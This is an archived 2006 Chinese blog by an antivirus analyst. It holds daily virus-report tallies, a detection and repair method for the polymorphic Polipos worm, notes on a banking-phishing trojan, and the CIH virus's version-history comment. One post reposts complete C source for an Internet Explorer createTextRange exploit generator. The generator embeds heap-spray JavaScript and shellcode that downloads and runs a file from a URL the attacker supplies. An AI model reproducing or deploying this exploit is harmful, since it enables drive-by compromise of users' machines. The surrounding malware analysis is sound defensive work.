加糖苦咖啡

我的博客搬家啦！

已经正式落户百度空间，欢迎大家访问！

http://hi.baidu.com/daishuo

- 作者： daishuo 2006年07月15日, 星期六 01:25　回复（0） |　引用（1）加入博采

纪念4.26——CIH日

cih_AUTHOR

; **************************************************************************** 
; * The Virus Program Information                                            * 
; **************************************************************************** 
; *                                                                          *
; * Designer : CIH Original Place : TTIT of Taiwan                           * 
; * Create Date : 04/26/1998 Now Version : 1.2                               * 
; * Modification Time : 05/21/1998                                           * 
; *                                                                          * 
; *==========================================================================* 
; * Modification History                                                     * 
; *==========================================================================* 
; * v1.0 1. Create the Virus Program.                                        * 
; * 2. The Virus Modifies IDT to Get Ring0 Privilege.                        * 
; * 04/26/1998 3. Virus Code doesn't Reload into System.                     * 
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System.             * 
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiook.              * 
; * 6. When System Opens Existing PE File, the File will be                  * 
; * Infected, and the File doesn't be Reinfected.                            * 
; * 7. It is also Infected, even the File is Read-Only.                      * 
; * 8. When the File is Infected, the Modification Date and Time             * 
; * of the File also don't be Changed.                                       * 
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call              * 
; * Previous FileSystemApiHook, it will Call the Function                    * 
; * that the IFS Manager Would Normally Call to Implement                    * 
; * this Particular I/O Request.                                             * 
; * 10. The Virus Size is only 656 Bytes.                                    * 
; *==========================================================================* 
; * v1.1 1. Especially, the File that be Infected will not Increase          * 
; * it's Size... ^__^                                                        * 
; * 05/15/1998 2. Hook and Modify Structured Exception Handing.              * 
; * When Exception Error Occurs, Our OS System should be in                  * 
; * Windows NT. So My Cute Virus will not Continue to Run,                   * 
; * it will Jmup to Original Application to Run.                             * 
; * 3. Use Better Algorithm, Reduce Virus Code Size.                         * 
; * 4. The Virus "Basic" Size is only 796 Bytes.                             * 
; *==========================================================================* 
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...                * 
; * 2. Modify the Bug of v1.1                                                * 
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.                      * 
; ****************************************************************************

- 作者： daishuo 2006年04月26日, 星期三 09:52　回复（0） |　引用（1）加入博采

P2P-Worm.Win32.Polipos.a的查杀原理(初步)

24号下班前，收到小陌的MSN消息，关于P2P-Worm.Win32.Polipos.a这个病毒的。惭愧得很，前2周一直在做项目开发，病毒分析工作扔下了，以致在小陌给我发信息前，都没有听说过这个病毒。病毒资料在小陌的blog上已经有了，昨天我看了一下这个毒，主要目的是查杀。
Polipos这个病毒用了变形引擎，每次感染的代码和数据都不同。我看了10分钟左右，觉得写一个搞定变形引擎的模块，工作量至少要2、3天。所以暂停了对变形代码的跟踪。在虚拟机里运行病毒，得到了几个感染样本。从感染样本中总结规律：
1、从被感染的样本来看，比原来多了一个节，节名为8个0字节，大小不定，60K左右，节属性为0xe0000060。
2、病毒用了EPO，替换原程序中对某个API的调用指令(call ds:[API地址])，用相对地址调用的方式(call virus_Entry)进入病毒入口函数。被替换的API是随机选择的，源程序中所有call ds:[API地址]语句都被替换了。
3、病毒入口函数是变形的，但最初几条语句总是：
push ebp
mov ebp, esp
sub esp, ??
pusha

      对Polipos.a病毒进行检测，可以从下面几点入手：
step 1、根据新增病毒节的特征，可以快速排除绝大多数正常程序；
step 2、读取病毒节数据，根据病毒入口函数初始代码的特点，全文扫描可能的病毒入口地址；
step 3、读取代码节(程序入口所在节)数据，全文扫描对可能病毒入口的调用语句。
      根据后来的实验显示，step 2找到的可能入口大约在15～25个，记录这些可能入口地址的包围盒(最大最小值)可以大幅优化step 3的执行速度。step 3可能找到多个调用语句，只选取最先找到的一个(因为病毒会在代码节后面的空隙处插入代码)。
     step 3结果不为空的样本，足以判断是病毒，误报率也应接近于0。

      通过检测模块，可以确定病毒入口地址。最基本的修复工作是：将程序中所有对病毒入口的调用语句还原成对API的调用。这里最大的难题在于，如果不搞定变形引擎，无法直接知道病毒替换了对哪个API的调用语句。
有一种间接方案可以考虑：
step 1、遍历Import表，记录所有API的位置；
step 2、全文扫描代码节，记录对各个API的引用情况；
step 3、如果step 2结果显示存在且仅存在1个未被引用的API，那么这个API就是被病毒替换的。
      需要说明的是step 2，通常编译器生成的调用API的代码有下面3种方式：
#1, call ds:[API地址]
#2, mov reg32, ds:[API地址]
    call reg32
#3, call jmp_API
jmp_API:
    jmp ds:[API地址]
     实验证明，对于病毒样本，step 3有时会找不到未被引用的API，这个概率接近15%。原因是编译器生成的代码中，对同一API可能应用不同方式的调用代码，而病毒替换的只是call ds:[API地址]这一种方式而已。
约15%清除失败的概率，使得本文描述的解决方案只能成为“初步”方案。这个初步方案的最大好处是完全绕开了变形引擎，因此实现起来工作量较小。代码完成，400行左右的规模，准备随KV 4月26日上午升级入库。

- 作者： daishuo 2006年04月26日, 星期三 09:24　回复（7） |　引用（1）加入博采

昨日病毒(2006.04.03)

摘要：4月3日上报次数较多的样本有：
mssave.exe -------- 562
extrmous.exe -------- 528
explore.exe -------- 497
guest.exe -------- 245
phost.exe -------- 218
lup.exe -------- 184
mssvcc.exe -------- 146
newname8.exe -------- 140
mousepad8.exe -------- 113
winsystems.exe -------- 108
keyboard8.exe -------- 71
进入全文查看它们的技术报告。　查看全文

- 作者： daishuo 2006年04月4日, 星期二 13:02　回复（5） |　引用（1）加入博采

灰鸽子和网络色情钓鱼

摘要：前些日子接到网友线报，反映有些人在QQ信息说明中打着色情交友的幌子传播病毒。当时好歹看了一下，然后就开始忙CMMI的工作，没有写到blog上。今天CMMI终于过了，突然想起这事来，补发一篇，希望能给那些用下半身思考的男性网友们提个醒，不要轻易上当 :-| ，详细内容见全文
girl_gbird

　查看全文

- 作者： daishuo 2006年04月1日, 星期六 02:33　回复（1） |　引用（1）加入博采

IE createTextRange漏洞文件下载木马生成器

IE的createTextRange漏洞已经出来几天了。这个漏洞的利用代码依然会分配大量内存，总得来说，可以远程代码执行，自然是严重等级的漏洞，但利用起来代价很大，512M内存的机器上跑的话，也需要1～2分钟才会运行shellcode，所以今后它的泛滥程度会远低于WMF/HHCTRL/MHTML等漏洞。

在这里，转载一个利用createTextRange漏洞的文件下载木马生成器的源码，供从事系统安全的朋友们娱乐。其实，大家可能早就baidu到一些了，呵呵。

/*
*
* Internet Explorer "createTextRang" Download Shellcoded Exploit
* Bug discovered by Computer Terrorism (UK)
* http://www.computerterrorism.com/research/ct22-03-2006
* Reliable exploitation by Darkeagle of Unl0ck Research Team
* http://www.milw0rm.com/exploits/1606
*
* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
* Severity: Critical
* Impact: Remote System Access
* Solution Status: Unpatched
*
* E-Mail: atmaca@icqmail.com
* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
* Credit to Kozan,Darkeagle,delikon,Stelian Ene
*
*/

#include <windows.h>
#include <stdio.h>

#define BUF_LEN         0x1518
#define FILE_NAME       "index.htm"

char body1[] =
	"<input type=\"checkbox\" id=\"blah\">\r\n"
	"<SCRIPT language=\"javascript\">\r\n\r\n"
	"shellcode = unescape(\r\n"
	"\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\" +\r\n"
	"\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\" +\r\n"
	"\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\" +\r\n"
	"\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\" +\r\n"
	"\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\" +\r\n"
	"\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\" +\r\n"
	"\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\" +\r\n"
	"\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\" +\r\n"
	"\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\" +\r\n"
	"\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\" +\r\n"
	"\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n"
	"\t\"%u0065";

char body2[] =
        "\r\n\r\nbigblock = unescape(\"%u9090%u9090\");\r\n"
        "slackspace = 20 + shellcode.length\r\n\r\n"
        "while (bigblock.length < slackspace)\r\n"
        "\tbigblock += bigblock;\r\n\r\n"
        "fillblock = bigblock.substring(0, slackspace);\r\n\r\n"
        "block = bigblock.substring(0, bigblock.length-slackspace);\r\n\r\n"
        "while(block.length + slackspace < 0x40000)\r\n"
        "\tblock = block + block + fillblock;\r\n\r\n"
        "memory = new Array();\r\n\r\n"
        "for ( i = 0; i < 2020; i++ )\r\n"
        "\tmemory[i] = block + shellcode;\r\n\r\n"
        "var r = document.getElementById('blah').createTextRange();\r\n\r\n"
        "</script>\r\n";

int main(int argc,char *argv[])
{
        if (argc < 2)
        {
                printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit");
                printf("\nUsage:\n");
                printf(" ie_exp <WebUrl>\n");

return 0;
        }

FILE *File;
        char *pszBuffer;
        char *web = argv[1];
        char *pu = "%u";
        char u_t[5];
        char *utf16 = (char*)malloc(strlen(web)*5);

if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
                printf("\n [Err:] fopen()");
                exit(1);
        }

pszBuffer = (char*)malloc(BUF_LEN);
        memcpy(pszBuffer,body1,sizeof(body1)-1);

memset(utf16,'\0',strlen(web)*5);
        for (unsigned int i=0;i<strlen(web);i=i+2)
        {
                sprintf(u_t,"%s%.2x%.2x", pu, web[i+1], web[i]);
                strcat(utf16,u_t);
        }

strcat(pszBuffer,utf16);
        strcat(pszBuffer,"%u0000\");");
        strcat(pszBuffer,body2);

fwrite(pszBuffer, BUF_LEN, 1,File);
        fclose(File);

printf("\n\n"  FILE_NAME  " has been created in the curent directory.\n");
        return 1;
}

// milw0rm.com [2006-03-23]

</body>
</html>

- 作者： daishuo 2006年03月27日, 星期一 23:04　回复（5） |　引用（1）加入博采

昨日病毒(2006.03.24)

摘要：3月23日上报次数较多的样本如下：
icntrl.exe -------- 222
lup.exe -------- 149
mssvcc.exe -------- 130
wuass32.exe -------- 93
mssm32.exe -------- 86
请进入全文查看它们的技术报告。　查看全文

- 作者： daishuo 2006年03月26日, 星期日 12:35　回复（4） |　引用（1）加入博采

昨日病毒(2006.03.23)

摘要：3月23日上报次数较多的样本有：
newname5.exe -------- 197
mousepad5.exe -------- 194
keyboard5.exe -------- 164
dpnss32.exe -------- 113
请进入全文查看它们的分析报告。　查看全文

- 作者： daishuo 2006年03月24日, 星期五 12:37　回复（3） |　引用（1）加入博采

昨日病毒(2006.03.22)

摘要：3月22日上报次数较多的样本有：
313.exe -------- 175
iplus.exe -------- 94
请进入全文查看它们的分析报告。　查看全文

- 作者： daishuo 2006年03月24日, 星期五 12:34　回复（0） |　引用（1）加入博采

昨日病毒(2006.03.20)

摘要：3月20日上报次数较多的样本有：
bmnss.exe -------- 217
mousepad4.exe -------- 151
newname4.exe -------- 150
keyboard4.exe -------- 108
请进入全文查看它们的分析报告。　查看全文

- 作者： daishuo 2006年03月24日, 星期五 12:32　回复（1） |　引用（1）加入博采

昨日病毒(2005.03.18)

上图是一个vb木马显示的窗口，该窗口背景图片是幅截图，就是xx网上银行的登录页面。木马监视当前用户窗口的标题文字，一旦发现用户正在使用IE浏览器登录此页面，立即关闭IE窗口，并弹出自己的虚假登录窗口，诱骗用户在木马窗口上输入卡号和密码。随即把截到的内容发送至病毒作者信箱。

- 作者： daishuo 2006年03月19日, 星期日 18:43　回复（0） |　引用（1）加入博采

昨日病毒(2006.03.16-03.17)

摘要：3月16和3月17日,上报较多的样本都是变种:
3.16日，
lup.exe 121次上报；
mssvcc.exe 96次上报；
3.17日，
newname3.exe 429次上报；
mousepad3.exe 401次上报；
keyboard3.exe 337次上报.
请进入全文查看它们的技术分析报告.　查看全文

- 作者： daishuo 2006年03月19日, 星期日 18:42　回复（0） |　引用（1）加入博采

昨日病毒(2006.03.15)

摘要：昨天上报次数较多的样本及其上报次数列表如下：
winscntrl.exe ---- 276
Windows-fix.exe ---- 120
~bNvD5b.exe ---- 110
win32ssr.exe ---- 39
请进入全文查看它们的技术报告。　查看全文

- 作者： daishuo 2006年03月16日, 星期四 16:59　回复（12） |　引用（1）加入博采

FrSIRT Exploit关闭了

昨晚上bloglines看东西，发现FrSIRT Exploit有1条更新，还以为是跟MS06-012有关的PoC代码出来了，结果却是这么一条消息：

Exploits and PoCs are available to FrSIRT VNS?/b> subscribers only.

Public exploits section has been definitively closed.

FrSIRT Exploits收费了，通过它的FrSIRT Vulnerability Notification Services。

- 作者： daishuo 2006年03月16日, 星期四 11:19　回复（0） |　引用（1）加入博采

昨日病毒(2006.03.14)

昨天（2006.03.14）收到的病毒样本，总体来说，没有什么新鲜的东东。sys.exe、mssvcc.exe和lup.exe，是3个上报次数超过100的高波变种(Backdoor/Agobot)，技术上和以前的变种没有什么变化，可以参考腾讯强制用户安装这个工具条，想想数以亿计的QQ用户，这点上报数字也就没什么说不过去的了。

最后，谨以下图欢迎soso加入IE工具条家族。

IE Toolbars

- 作者： daishuo 2006年03月15日, 星期三 19:34　回复（3） |　引用（1）加入博采

加糖苦咖啡

关于作者

日历　年月日

快速登录

搜索

快速浏览

最新文章

文章索引

在线留言

最新评论

我的安全网摘

瑞星病毒播报

被黑.cn网站列表

SANS ISC INFOCon

我的相册

友情链接

安全网站

LOGO链接

访问统计：
文章个数:158
评论个数:355
留言条数:18